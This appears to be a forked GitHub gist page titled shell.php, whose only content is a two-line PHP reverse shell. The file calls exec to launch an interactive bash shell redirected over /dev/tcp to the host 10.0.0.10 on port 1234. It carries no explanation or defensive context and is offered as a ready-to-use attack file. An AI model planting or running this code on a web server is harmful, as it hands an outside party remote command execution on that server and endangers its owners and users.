Skip to content

Instantly share code, notes, and snippets.

@vishal12300
Forked from rshipp/shell.php
Created June 13, 2022 11:44
Show Gist options
  • Save vishal12300/8f73ac0afcf01415e5fdddafec954cd9 to your computer and use it in GitHub Desktop.
Save vishal12300/8f73ac0afcf01415e5fdddafec954cd9 to your computer and use it in GitHub Desktop.

Revisions

  1. @rshipp rshipp created this gist Jul 17, 2014.
    2 changes: 2 additions & 0 deletions shell.php
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,2 @@
    <?php
    exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");